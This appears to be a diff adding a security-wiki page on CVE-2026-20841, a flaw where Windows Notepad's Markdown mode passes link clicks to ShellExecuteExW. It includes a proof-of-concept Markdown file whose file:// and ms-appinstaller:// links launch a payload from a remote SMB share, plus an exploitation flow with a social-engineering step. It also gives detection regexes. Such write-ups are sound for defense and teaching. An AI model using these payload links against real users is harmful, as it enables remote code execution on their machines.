|
| 1 | +# Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers) |
| 2 | + |
| 3 | +{{#include ../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +Modern Windows applications that render Markdown/HTML often turn user-supplied links into clickable elements and hand them to `ShellExecuteExW`. Without strict scheme allowlisting, any registered protocol handler (e.g., `file:`, `ms-appinstaller:`) can be triggered, leading to code execution in the current user context. |
| 6 | + |
| 7 | +## ShellExecuteExW surface in Windows Notepad Markdown mode |
| 8 | +- Notepad chooses Markdown mode **only for `.md` extensions** via a fixed string comparison in `sub_1400ED5D0()`. |
| 9 | +- Supported Markdown links: |
| 10 | + - Standard: `[text](target)` |
| 11 | + - Autolink: `<target>` (rendered as `[target](target)`), so both syntaxes matter for payloads and detections. |
| 12 | +- Link clicks are processed in `sub_140170F60()`, which performs weak filtering and then calls `ShellExecuteExW`. |
| 13 | +- `ShellExecuteExW` dispatches to **any configured protocol handler**, not just HTTP(S). |
| 14 | + |
| 15 | +### Payload considerations |
| 16 | +- Any `\\` sequences in the link are **normalized to `\`** before `ShellExecuteExW`, impacting UNC/path crafting and detection. |
| 17 | +- `.md` files are **not associated with Notepad by default**; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable. |
| 18 | +- Dangerous example schemes: |
| 19 | + - `file://` to launch a local/UNC payload. |
| 20 | + - `ms-appinstaller://` to trigger App Installer flows. Other locally registered schemes may also be abusable. |
| 21 | + |
| 22 | +### Minimal PoC Markdown |
| 23 | +```markdown |
| 24 | +[run](file://\\192.0.2.10\\share\\evil.exe) |
| 25 | +<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller> |
| 26 | +``` |
| 27 | + |
| 28 | +### Exploitation flow |
| 29 | +1. Craft a **`.md` file** so Notepad renders it as Markdown. |
| 30 | +2. Embed a link using a dangerous URI scheme (`file:`, `ms-appinstaller:`, or any installed handler). |
| 31 | +3. Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad. |
| 32 | +4. On click, the **normalized link** is handed to `ShellExecuteExW` and the corresponding protocol handler executes the referenced content in the user’s context. |
| 33 | + |
| 34 | +## Detection ideas |
| 35 | +- Monitor transfers of `.md` files over ports/protocols that commonly deliver documents: `20/21 (FTP)`, `80 (HTTP)`, `443 (HTTPS)`, `110 (POP3)`, `143 (IMAP)`, `25/587 (SMTP)`, `139/445 (SMB/CIFS)`, `2049 (NFS)`, `111 (portmap)`. |
| 36 | +- Parse Markdown links (standard and autolink) and look for **case-insensitive** `file:` or `ms-appinstaller:`. |
| 37 | +- Vendor-guided regexes to catch remote resource access: |
| 38 | +``` |
| 39 | +(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4} |
| 40 | +(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2} |
| 41 | +``` |
| 42 | +- Patch behavior reportedly **allowlists local files and HTTP(S)**; anything else reaching `ShellExecuteExW` is suspicious. Extend detections to other installed protocol handlers as needed, since attack surface varies by system. |
| 43 | + |
| 44 | +## References |
| 45 | +- [CVE-2026-20841: Arbitrary Code Execution in the Windows Notepad](https://www.thezdi.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad) |
| 46 | +- [CVE-2026-20841 PoC](https://github.com/BTtea/CVE-2026-20841-PoC) |
| 47 | + |
| 48 | +{{#include ../banners/hacktricks-training.md}} |
0 commit comments